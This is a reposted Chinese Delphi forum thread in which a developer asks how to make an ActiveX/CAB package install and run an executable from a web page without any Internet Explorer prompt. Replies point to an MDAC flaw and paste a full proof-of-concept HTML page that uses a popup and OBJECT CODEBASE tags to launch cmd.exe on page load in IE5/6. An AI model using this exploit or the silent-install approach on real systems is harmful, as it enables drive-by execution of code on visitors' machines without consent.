delphi2007 教程

delphi2007 教程

首页 新随笔 联系 聚合 管理
  1013 Posts :: 0 Stories :: 28 Comments :: 0 Trackbacks
由上网中病毒木马所想到的...与网页中使用ocx,cab包有关。 Delphi / Windows SDK/API
http://www.delphi2007.net/DelphiBase/html/delphi_20061218114045129.html
不知你是否有这样的经历,打开了某个网页之后,发现系统中毒了,而你并没有进行任何可疑的操作,仅仅是就打开了一个网页而已。  
   
  我曾经就是为了杀毒,去查资料,结果打开一个貌似杀毒介绍的网站,刹那间,机器上多中了10几种病毒。而此时IE并没有提示我有什么插件,是否需要安装等等。  
   
  现在的问题就是,我自己做的一个ocx,不管怎么打包,怎么签名,到客户那里都会有提示是否需要下载的,我就奇怪了,有些病毒怎么就那么强悍??  
   
  我现在想实现的效果就是,客户端不需要任何提示,第一次下载的时候不需要提示,以后每次运行的时候也不需要提示,而且IE的安全设置就是默认的设置。另外,我还想实现自动下载cab包完毕之后,自动运行包内的一个可执行文件。  
   
  高手看看是否能实现,或发表点意见,我不是想做病毒,而是想把b/s结构的软件优化一下,让他智能点。  
   
  这个想法已经很久了,试验了很久也没能实现!

那些病毒不是OCX,而是EXE文件。

那么他怎么让你的机器运行那些exe文件的??

ie6以前的版本可以实现

是EXE文件是利用了MDAC的一個漏洞  
  詳細情況請見微軟安全公告:http://www.microsoft.com/china/technet/security/bulletin/MS06-014.mspx

最新研究报告:  
   
  <HTML>  
  <HEAD>  
  <TITLE>IE6   security...</TITLE>  
  <SCRIPT   language=JScript>  
  var   programName=new   Array(  
          'c:/windows/system32/cmd.exe',  
          'c:/winnt/system32/cmd.exe',  
          'c:/cmd.exe'  
  );  
   
  function   Init(){  
          var   oPopup=window.createPopup();  
          var   oPopBody=oPopup.document.body;  
          var   n,html='';  
          for(n=0;n<programName.length;n++)  
                  html+="<OBJECT   NAME='X'   CLASSID='CLSID:11111111-1111-1111-1111-111111111111'   CODEBASE='"+programName[n]+"'   %1='r'></OBJECT>";  
          oPopBody.innerHTML=html;  
          oPopup.show(290,   190,   200,   200,   document.body);  
  }  
   
  </SCRIPT>  
  </head>  
  <BODY   onload="Init()">  
  <p>  
  This   page   doesn't   do   anything   malicious(这个页面没有任何恶意),   but   is   a   demonstration   of   how   to   execute   a   program   on   a   remote   machine   using   the  
  marvelously   secure   Internet   Explorer   web   browser!!(但它演示了如何在一个远程机上使用令人惊异的安全的IE浏览器执行一个程序!!有点讽刺微软的IE的味道,即通过IE执行客户端机中的程序)  
  </p>  
  <p>  
  Up   until   at   least   18/02/02,   this   script   would   open   a   command   window   when   viewed   in   IE5/6   under   WindowsXP   and   Win2k   (possibly   also   WinME).   There  
  are   currently   no   patches   available   using   "Windows   Update"   which   will   prevent   this.  
  </p>  
   
   
  Delphi中的人气实在不怎么样!!!

去他妈的,自己解决了。  
   
 

怎么解决的,能不能告知  
 

posted on 2008-10-14 16:35 delphi2007 阅读(100) 评论(0)  编辑 收藏 引用
只有注册用户登录后才能发表评论。